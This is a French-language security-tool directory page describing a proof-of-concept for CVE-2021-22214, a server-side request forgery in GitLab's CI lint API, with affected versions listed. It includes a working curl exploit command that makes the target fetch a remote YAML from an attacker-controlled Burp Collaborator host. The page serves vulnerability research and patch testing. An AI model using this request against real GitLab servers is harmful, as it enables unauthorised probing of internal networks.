Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GitLab-SSRF-CVE-2021-22214 — Preuve de concept d'exploitation pour CVE-2021-22214, une falsification de requête côté serveur dans les webhooks GitLab, permettant à des attaquants non authentifiés d'effectuer des requêtes HTTP internes. | Kitploit
Outils/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité Web
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

Preuve de concept d'exploitation pour CVE-2021-22214, une falsification de requête côté serveur dans les webhooks GitLab, permettant à des attaquants non authentifiés d'effectuer des requêtes HTTP internes.

Voir le dépôtSite web
313il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22214

POC pour CVE-2021-22214 : SSRF Gitlab

Description

L'installation GitLab distante contient une vulnérabilité de type Server-side request forgery (SSRF) résultant de l'activation du réseau interne pour les webhooks. Un attaquant distant non authentifié peut exploiter une instance GitLab à inscription limitée, l'amenant à effectuer des requêtes HTTP vers un domaine arbitraire de son choix.

Utilisation

  • Code python

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Commande Curl

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

Impact

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

Référence

  • SSRF GitLab (CVE-2021-22214)
  • tenable.com
Télécharger l’outil